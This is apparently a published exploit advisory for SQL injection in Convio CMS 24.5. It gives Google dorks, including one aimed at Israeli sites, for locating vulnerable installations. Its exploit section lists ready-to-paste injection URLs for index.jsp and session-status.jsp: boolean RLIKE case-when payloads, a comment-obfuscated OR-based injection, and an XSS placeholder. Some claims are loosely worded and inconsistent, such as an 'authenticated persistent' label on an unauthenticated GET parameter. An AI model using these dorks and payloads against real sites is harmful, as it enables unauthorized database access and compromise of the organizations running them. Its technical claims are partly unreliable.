/*! - # VULNERABILITY: Convio CMS SQL injection Vulnerabilities version 24.5 (Work for ALL VERSION 24) - # Authenticated Persistent SQL injection - # GOOGLE DORK: site:.com /about/news/index.jsp?page=2 - # GOOGLE DORK: site:.il /about/news/index.jsp?page=2 - # DATE: November 2024 - # SECURITY RESEARCHER: E1.Coders - # VENDOR: Convio CMS [http://www.convio.com ] - # SOFTWARE LINK: http://www.convio.com/ - # CVE: CVE-2024-9986 - # CWE: CWE-89 */ ### -- [ Info: ] [i] A valid persistent SQL INJECTION vulnerability was discovered in of the Convio version 24.5 website installed. [i] Vulnerable parameter(s): - inurl:.com /about/news/index.jsp?page=2 ### -- [ Impact: ] [~] Malicious SQL code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Details: ] [~] vulnerable file is "index.jsp" and "session-status.jsp" ### -- [ EXPLOIT : ] https://www.TARGET.com/about/news/index.jsp?page=2{sql inject code} https://www.TARGET.com/about/news/index.jsp?page=2 RLIKE (case when 7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end) https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379-- https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'=' https://www.TARGET.com/search/?q=<XSS SCRIPT BYPASS> ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders